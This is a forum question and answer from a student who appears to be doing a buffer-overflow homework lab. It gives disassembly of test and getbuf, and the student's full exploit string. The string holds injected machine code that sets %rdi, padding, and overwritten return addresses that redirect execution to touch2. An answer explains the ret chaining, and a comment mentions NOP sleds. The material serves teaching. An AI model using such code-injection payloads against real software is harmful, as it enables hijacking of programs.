# Sequence of operations in buffer overflow "attack"

Tags: assembly, stack, x86-64, buffer-overflow

This is a homework assignment that I already have the answer for but don't understand why it is actually working?

What I need to do is get a function to execute the code for `touch2()` instead of returning to a parent function `test()`. Also, I must make it appear to `touch2()` as if I have passed my cookie-id as its argument.

C representation of `touch2()`

```
1.void touch2(unsigned val){
2.    if (val==cookie){
3.       //code that says I passed
4.    }
4.    else {
5.       //I failed
6.    }
```

Disassembled code for `test`

```
0000000000401999 <test>:
401999: 48 83 ec 08             sub    $0x8,%rsp
40199d: b8 00 00 00 00          mov    $0x0,%eax
4019a2: e8 31 fe ff ff          callq  4017d8 <getbuf>
4019a7: 89 c2                   mov    %eax,%edx
4019a9: be a8 31 40 00          mov    $0x4031a8,%esi
4019ae: bf 01 00 00 00          mov    $0x1,%edi
4019b3: b8 00 00 00 00          mov    $0x0,%eax
4019b8: e8 63 f4 ff ff          callq  400e20 <__printf_chk@plt>
4019bd: 48 83 c4 08             add    $0x8,%rsp
4019c1: c3                      retq
```

Disassembly of `getbuf`:

```
00000000004017d8 <getbuf>:
4017d8: 48 83 ec 38             sub    $0x38,%rsp
4017dc: 48 89 e7                mov    %rsp,%rdi
4017df: e8 7e 02 00 00          callq  401a62 <Gets>
4017e4: b8 01 00 00 00          mov    $0x1,%eax
4017e9: 48 83 c4 38             add    $0x38,%rsp
4017ed: c3                      retq
```

And my solution:

```
48 c7 c7 f0 f7 dd 2c c3 /* assembly language inst. to set my rdi register and then return */
41 41 41 41 41 41 41 41 /* padding to get to 56 bytes */
41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 /* padding to get to 56 bytes */
d8 20 68 55 00 00 00 00 /* address for %rsp at 'Gets' --> this holds the input when you type in a string */
1a 18 40 00 00 00 00 00 /* address for touch2 */
```

I understand the need for the padding in my solution but still have the following questions:

1. Why does my solution not work if I change the instructions to set `%rdi` anywhere other than the first line?
2. How does `touch2()` get called if the `return` position for `getbuf` holds the address for `Gets`?

I used gdb to get the addresses for `Gets`:

```
(gdb) x/s $rsp
0x556820d8: "adlkfajsdlkfjaskldjfalksdjflasdkjflkasd" //string I typed into `Gets`
```

Answer (score 0, accepted):

1. It should work anywhere, assuming you put the correct address into the stack (the penultimate line).
2. Your exploit code ends with a `RET` (the `c3`). That will fetch the next address from the stack and go there. Since you have stored the address of `touch2` on the stack, that's where it will go.

Comment: thanks for your answer to `2`! But for `1`, putting the `48 c7 c7 f0 f7 dd 2c c3` only works in different locations when I use a NOP sled.

Comment: That's because you probably have not adjusted the address on the stack as I said.